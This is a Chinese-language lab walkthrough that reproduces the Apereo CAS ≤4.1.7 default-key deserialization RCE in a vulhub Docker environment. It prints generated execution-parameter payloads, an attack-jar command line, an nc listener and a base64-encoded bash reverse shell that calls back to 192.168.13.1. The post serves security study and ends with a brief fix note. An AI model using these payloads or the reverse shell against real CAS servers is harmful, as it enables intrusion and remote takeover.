[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞

博主介绍

‍ 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~
✨主攻领域：【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯（一键三连）
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限，欢迎各位大佬指点，相互学习进步！

一、漏洞编号

apereo-cas/4.1-rce

二、影响范围

Apereo CAS <= 4.1.7

三、漏洞描述

Apereo CAS 是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞（硬编码导致的漏洞），进而执行任意命令。

四、环境搭建

1、进入apereo-cas/4.1-rce环境

cd vulhub/apereo-cas/4.1-rce

2、启动apereo-cas/4.1-rce环境

docker-compose up -d

3、查看apereo-cas/4.1-rce环境

docker-compose ps

4、访问apereo-cas/4.1-rce环境

http://192.168.13.160:8080/cas/login

5、查看apereo-cas/4.1-rce漏洞提示信息

cat README.md

6、关闭apereo-cas/4.1-rce环境

复现完记得关闭环境

docker-compose down

五、漏洞复现

1、登陆页面抓包

进入登陆页面随便输入账号密码进行登录，burp抓包并放入重放攻击模块
1、进入登陆页面进行登录

2、burp抓包

3、放入重放攻击模块

2、生成创建文件的payload

1.下载Apereo-cas 4.1 反序列化工具

Apereo-cas 4.1 反序列化工具apereo-cas-attack-1.0-SNAPSHOT-all.ja在文末给出

2.利用工具生成payload

生成payload命令如下

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch _PowerShell.txt"

生成的payload如下

8196273b-9234-4607-bb24-a33fbb881e2a_AAAAIgAAABAYu9Bt0UJO04N4RtF428tjAAAABmFlczEyOPtg5WFLA%2FDq5NXUoglyCbE1WLyutit5ttCEQsjZHMj52yq2o3JSNsXixfiE5VO7DERS5tLyppJ9clObR2Je8wKRA5E450YmKZtyesoaDH8yo4gsGiJ52lcFJfWSEUNRYwAqPmijyVNJqKSQFY4de2evNFFFzaeK3HPAw1T0mhFayWFlnu30gaPmXUrmqfSeezF%2BDEiLvG%2FDYxqoYwpx2%2BhPTzj5IT73d2TY%2BZ%2Fbu0YMavfWLV%2BjW5gwehj8BsbqiDsFcicG31PaXGI6pjBERIpdPdtRSLWjJ49uUJB7UZD2uD2A8T59K3B8%2B3qCm6GOWJxTh0Cp%2FxWNhervxULdiAl%2FBP3rX%2FK7IjHGRGLNsZAdJQm%2B12OIWnhRW86kT9V%2Fonr0NKcUj2Ii3iIAQkjJ2lpRSuNZaEAUgqA0MPOtPMv8ntQLDb4pNSQee%2B2HejfHd6CFvRUaWlhKlZAu8k5Rgb6UsFgIt2ft%2FS4oI0EGrgvv1%2BtD3xueIW3Od2UL9G9l%2F8GY0%2BZe95aXnNs322qRG%2BUQJU%2F7Cxhv%2Ber0yM5YekcHbBtrCaSwViNEGhRcS53PqANlI8TwA2DCKW7mFLj%2BSkkcAd7N4orWvURUwD0Nxmud4rWprU13UwEs9jCTQfWZObGIVvEjdTvVaB0E1ToKJfDA6GSBQvFi6bdLPwLRxiWib85%2BT6URM8RNMS3dMSYukMd%2B8d2SyHN3WUtmrveS0lNuRvjAmYoXtF4mjjNQ8nqt98bxWKiZz%2F6oNlOTnPVT8XmJG1d%2BFHHmxHXpjQE74lSFVeIxysb1gQsBpn4bh720HYIsioOpDsMyMfNHWefE6UGk8hfKiNj4s61ueQiMlrFbGN6bj6opjgb3LBqBxPtNPfXynzuVNkIaUamy7IgG68xd%2B1RDPVUg3a5ra21Wv%2Bj%2BhT2pQfztcFmJ%2FQ6Es4iF36WNOVARTIwDlYugV29FFXbtOobN%2BkWO1yEMewzCWd44vMlZde2OW5gYdYu0BqGbh7unbEPXZ7xIy7%2B0PPbFYHqK7wwOr%2B%2FnQ%2F8OLCqzerE%2FQnZ4a%2BjJFAvcHXDZkWD9I1%2BxMvabeMKBs9yZlX3y8de0rkwEbp7JBnDYKU%2Bu%2B%2FXgHs3ODWw436AyOI6N2mDtBUJILgm9nDrlr0ijUDnnshxruPazQmgQ6E96jHuTUhk8doTyzt4359NPOPXL5HrYGqRDJtc1%2Fp%2FiHBzB90MmOxIA9SHv5rFY9pnNAb2oqW%2Bwbk%2FlJr3mkIokH3aVv%2Fcda5YA%2F7K2HvCo8gPe%2F9Sozz5MeUqvfcO0TSwh6bLPOhZHxUkbbD5Yws2%2F6n1kNPiD0Zd0ZbZ7xKDUmFHfiTH%2BP0iW5BapjvXsM%2BRiGZ9uJXsqXnBGpR2mnAm0QamFdqghnnx496qAof4puOdB%2BUZfHtlTx5u5DGeQT1mLV8Tu5Jh91dgw1DOvqKbqzhHagxl4TmIRcQJ1fh4apWjjK0NgvAGi8ACZBxPsK1nxgGj8yBX8c2VAy2Iol3ihJcG%2FXRUwIL2PCyXEW2ll0NqjSUHZ4fe0LBOqeYAp5xzAPHcn5Th1m6F%2BUm437RfITIONHDDyg7Z6Hf46KieHYlO70WDvZNeaZAPWnqZ%2BnG3IAFaBctIt0x%2B9%2FH9KERPc0Le1OlESXC5La3AMK%2BmJi34eGTVaKrZTw4CvxRUIVgtjfEiaaEGiiQfHUUoZIrUfruSrXEB3Ojr0T3zUslJxBKX25e3rbuweJP7zZ45r7ZJoHcXWKgYF4E8OJGkQ64jJm2xIMhXxIp%2BUUU9dCAyrFpVw4rTDDlxfKqLeMqlZDpwmNQsloVIPnge9wlUBA0rjBIbc1WLdwsUHtkvPXEjRka9nB1QLa1Bk6XxZA2s1GdXth%2BEAtZMsK4lWwXC01VLwAiF0tD%2BGH4aQp0IqJYG7ZukJ%2BEhwLQ38jF8pqc6EJ53buDA0wtTX1hiHN0%2BEgRFPHMdkwwEOi5hWDwbCGzqgW2rkrP7YgQ%3D%3D

3、修改请求包创建文件

将抓到的包发送至repeater模块之后，修改参数execution内容为生成的payload，然后进行请求

返回500，但是文件创建成功
进入容器发现_PowerShell文件创建成功
进入容器相信都不陌生，我就不详细讲了

docker ps
docker exec -it e26dfa6f24aa /bin/bash
ls

六、Getshell

1、攻击机监听

攻击机采用nc进行监听
nc反弹shell在文末给出

nc -lvvp 55555

2、靶机连接

1.反弹shell命令

bash反弹shell不熟悉的可以看文末资料，讲的很详细，这里就不详细讲解的

bash -i >& /dev/tcp/192.168.13.1/55555 0>&1

2.Exec编码

Exec编码工具在文末给出

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzLjEvNTU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}

3.利用工具生成payload

Apereo-cas 4.1 反序列化工具apereo-cas-attack-1.0-SNAPSHOT-all.ja在文末给出
生成payload的命令如下

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzLjEvNTU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}"

生成的payload如下

ca8083d8-a50f-49b2-b316-7b3b71062c3d_AAAAIgAAABBLOMTYRg64P3aR0OkJm6ZDAAAABmFlczEyODtQ5CWToNSGto8GddfQNW0xpq8qlvKkv%2FOUGc6Sh6zbjbdVal%2BeIN%2Fjo5OWBWWzOajqRFJIrO7VBByVqareBrK0wJ2%2FqnZX1FkYrGtxWfZ74stc%2FirNCLJRzGfrdbZUwiu3Hc7okDJ1Lycx8zxJ52yJls4dmupmAHrngHsr7XRYuY%2BXmXdw5MmmwDEp4sv7kUXOaPtBS6Dp5eJCZYoXPajdSgbNP9CYXQcSapqcz8Zj%2FUpBz9dZmgj%2Fy98bFAKjJ7j3tKO6yzDwaVzA9ESKI7tYodw9J1kyNP5unuwGwceHOodBPJ1FoBHeqwUw%2FdGF5NNV17tFhzKhZJhZ9qglMebC8shafVRHCYhc1vmBqvmHjv%2Fmashrrv2ha9z6jgLixYUxcdZa%2FmDBaBwJ%2F1EMvvT6FIQxrv4F4oXw9om6WfXk3lH%2FAXG6hXZL7hcgnl2XIK5ChpbV8XcCM%2FbES5w%2BUvBIT1f8gijUzW30K1nSuMxVOSKd%2B4gLPu42jm59H4qpINo2pHrJy1QYNklJk%2BlF5SaypFfKSdCrznVqJ0QFDLNQfspKTPgh26xsIS6J9NOVulpki0JQltUtFCRTkvHdvwgCZI4MBQuJ%2BYb5LGXuF6XTb%2FXTwIQM%2BKjk%2B%2Bi2m%2Fm0tAdHimrFKC%2Fej1rykyRcFw9t3ObssznxFOPTHrGJn01dfvuYOVurXkCca0E1b45ZOPlvJVptdu%2BpOCwc%2F%2B2smsbo2kMM%2BJ7o3HsKdue1Q091BAygt509sY5s1zGPm7J7vYD22qhk9KCBJvoV2uA%2BKx2VunKo0ghbuLo4NDGc7raNJV99xKHbcchBE8jXmFweHfOmW0MVPHLuJTKayiaIH6Ek0o6jvikludTkwOW7EdEyPgB6CHkL4HdsCqrpMR1Vj3ym6SXCXZqg9Rrjxfn31yhMuVuvGGCfYrmFUnfvSYcD611Rj3DWgfBkXCEiHRuRW5vqSFdDAh6Cm27C%2FTLtL%2B0oVqb0Zuaxw8J0iImZQwWidozaGpewJNUGtscNAOWC4L576FBE3JF2LYvm48Wp7sUYDrVLmT0Brmhw%2BTA7ABtG45%2Fy5vxhM10jffrS6Oqtt1rl4NQkgSDHyMYXpuL3AAY8jBZZY0Swz3ouzPe2rr7ton5s5%2FYn3G9jtiWnuG3HhjdmEFw4unikZvh4WUBtFwfJzpHEWGQQx7BmxFrhmUkoQtXALoVbH1SeePRtUnaQtX%2BnwDNJTpiLdDKiT6WK1YcJBdllhCOJScYunfovoy8wxQl7%2FgRpupZo%2BZRt%2BVv1apkKCzYz8W9gVWC%2FGhoB1a48KToGWpa2oUlfpCOFfVXGE%2BOpiwf7EyZTg3KDk1OAYvHmrTSK2JAOl1f66QMIF7p3Ugi5cz20ioaEtlbYOgv519UsrFjdXDwcU6j6Yh4iF84tZku%2B7SFf03g9%2FEAzK%2B7GnnLU9a2E6ueH61ntt5REOAX9UrJWaf6MeNlH5wmGWYpCl1pfiQCPI8mLlS4SA2%2FdFTxPQriwQF5CYHc9FINEU%2FRbhELE8jj3J2u5NMRaQhAlVBllQhisAzmL6dP8jeqdQlI%2B4QlEM1%2Fl1FmV4wh41ChoUJq%2FjiNS0NM7ZBnWrBHs%2BPsZxOYAemx3HHmT1ujtYleG2Z4Z%2BkBWeEz3nAn1buCQU28QtUQAmW7sv1Pf7pFEO7nuLrUEYZvjjlexqga5W%2F5G9lSlRVFkybGuUMpWLkAiEKWcziY1R3i6tAAHz%2Bqg%2BxkCweRHtehCukwvtmAtTuEmC3jGVxWsGMNcU57B%2Frdco7CSS64iIYDSkNFtFmW5lD3CpLzdNDARie3SkUxZnZYOApEO7fXNNJnbuPv0WYKzfMdFmoWhRtUBHJuZel4CXfdsYzZiEPA90fYzWL2n07K1fHj3IugtrDz4RZb%2BiSyKDIWlOhHGtFaV7032z0rj5uIH6Hz0i2LscdtY0%2Fwx%2FPGucU50kx%2B4G6zoOvhKHExiiZe2Z20MJuWYGAsoP7WVQYCtgC0oGK7zzuITmeYX1mVD0zWaffRRMcg92zr8A7jqHPb98PR48RrWSvnNDgzcs8QsdBA0J8lYHjld3kk%3D

4.修改请求包创建文件

发送至repeater模块，修改参数execution内容为生成的payload，进行请求

3、攻击机getshell成功

执行ls
发现我们之前创建的文件

七、漏洞修复

及时更新为最新版本

八、相关资源

十、相关资源

1、docker 搭建 vulhub 靶场环境
2、[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本（含漏洞复现文章连接）
3、[ vulhub漏洞复现篇 ] vulhub 漏洞集合（含漏洞复现文章连接）
4、下载命令执行工具生成payload
5、Exec编码工具
6、Bash反弹shell
7、nc反弹shell